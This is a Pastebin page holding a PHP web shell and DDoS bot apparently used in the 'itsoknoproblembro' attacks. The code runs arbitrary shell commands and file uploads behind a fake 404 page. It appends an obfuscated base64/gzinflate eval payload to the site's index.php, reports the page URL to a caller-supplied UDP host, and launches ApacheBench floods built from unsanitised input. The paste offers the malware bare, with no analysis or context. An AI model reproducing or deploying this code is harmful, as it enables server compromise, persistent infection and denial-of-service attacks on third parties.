SHARE
TWEET

Untitled

a guest Oct 4th, 2012 902 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php error_reporting(0); $base = dirname(__FILE__)."/";
  2. function stoped() {cmdexec("killall -9 perl;
  3. killall -9 perl-bin;
  4. killall -9 perl-cgi;
  5. "); unlink($base."start.php"); unlink($base."f1.pl"); unlink($base."run.pl"); unlink($base."startphp.php");
  6. print "<stopcleandos>Stop & Clean</stopcleandos>"; apache_child_terminate();
  7. }function UploadFile($File){cmdexec("killall -9 perl"); cmdexec("killall -9 perl-bin"); cmdexec("killall -9 perl-cgi"); $target_path ="./"; $target_path = $target_path . basename( $File['name']);
  8. @move_uploaded_file($File['tmp_name'], $target_path);
  9. }function cmdexec($cmd){if(function_exists('system'))@system($cmd);
  10. elseif(function_exists('passthru'))@passthru($cmd);
  11. elseif(function_exists('shell_exec'))@shell_exec($cmd);
  12. elseif(function_exists('exec'))@exec($cmd);
  13. elseif(function_exists('popen'))@popen($cmd,"r");
  14. }function curPageURL(){$pageURL = 'http';
  15. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";
  16. }$pageURL .= "://";
  17. if ($_SERVER["SERVER_PORT"] != "80") {$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  18. } else {$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  19. }return $pageURL;
  20. }function DNullRequest() {@ob_start();
  21. print "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /indx.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>";
  22. die();
  23. }if ($_GET['action']=="status") {print "itsoknoproblembro";
  24. exit();
  25. }if ($_GET['action']=="start.php") {cmdexec("ps | grep -r perl");
  26. exit();
  27. }if ($_GET['action']=="startphp.php") {cmdexec("ps | grep -r php");
  28. exit();
  29. }if ($_GET['action']=="infection") {$up = "<?php eval(gzinflate(base64_decode('jVPva5xAEP1+cP/DsAh3QlNb6IfQqF8S0xaSXrjzAsUc4rl7vQV1l3UsTUL+9+4vg/RSqMi6uu/Nm5k3MqWEKhWTQiHvfi4/hBfzWUBFrSCBoNxk6/tsXZCr1eX2Nvuel+vVKic7jeEHWAbllywvFoNsFjtIEliIii5CeJ7PWH0UEMfx1/z2Zj6LZWqXa94w2MpGw+Jon8aR/e5WrPYNM5uDUC2wrsZHyRLSDg1yWSmMzPczWmFFAFqGR0ETcrfa5MSQeCcHBEc5ckpZR6CrWv1W1QR+Vc2gt4NVtnhUdqWplusQev6kzz+S9IcYFNg0P0McmbNUPzXOoV+VHOHT+ahy0BTi9e0+HVmRl/qHoOsGXHH134q+GmtSNCYgKzyOCSD7jSdd6Yd9y/GVvfW98FIBso7OZ8Yu7y3ve4baYdPiwoXfhaG2NnBtNFXaEZkC3gfl9bebbFO4JuwKYrKbzMsUnCSEhM9/h3ub/+IC1EI+Lk8w2MrS4d7BJFxoJxH0ZaeRWFvdMaOAQjd8gn7oyMUUfQYb3XGNIXBalTFDVwvEsV6ANT0b1aTi2mGSmT8L/Lj7mfJwd/8B')));
  30. ?>"; $index =$_SERVER['DOCUMENT_ROOT']."/index.php";
  31. if (file_exists($index)) {$fp = @fopen($index, 'a+');
  32. @fwrite($fp, $up);
  33. @fclose($fp); $content = file_get_contents($index);
  34. if (eregi("RSqMi6uu",$content)) {print "<infectdos>Infected</infectdos>";
  35. }else{print "<infectdos>Not Infected</infectdos>";
  36. }}else{print "<infectdos>N E I</infectdos>";}}switch($_POST['action']){case "upload":UploadFile($_FILES['file']);
  37. break;
  38. case "stop":stoped();
  39. break;
  40. case "ust":$page = curPageURL(); $ip = $_POST['ip']; $port = "11"; $out = $page."\n"; $socket = stream_socket_client("udp://$ip:$port");
  41. if ($socket) {stream_set_write_buffer($socket, 0); stream_socket_sendto($socket,$out);
  42. }fclose($socket);
  43. break;
  44. case "ab":$url = $_POST['url']; $c = $_POST['c']; $n = $_POST['n']; cmdexec("ab -c $c -n $n $url");
  45. break;
  46. default:DNullRequest();
  47. break;
  48. }?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top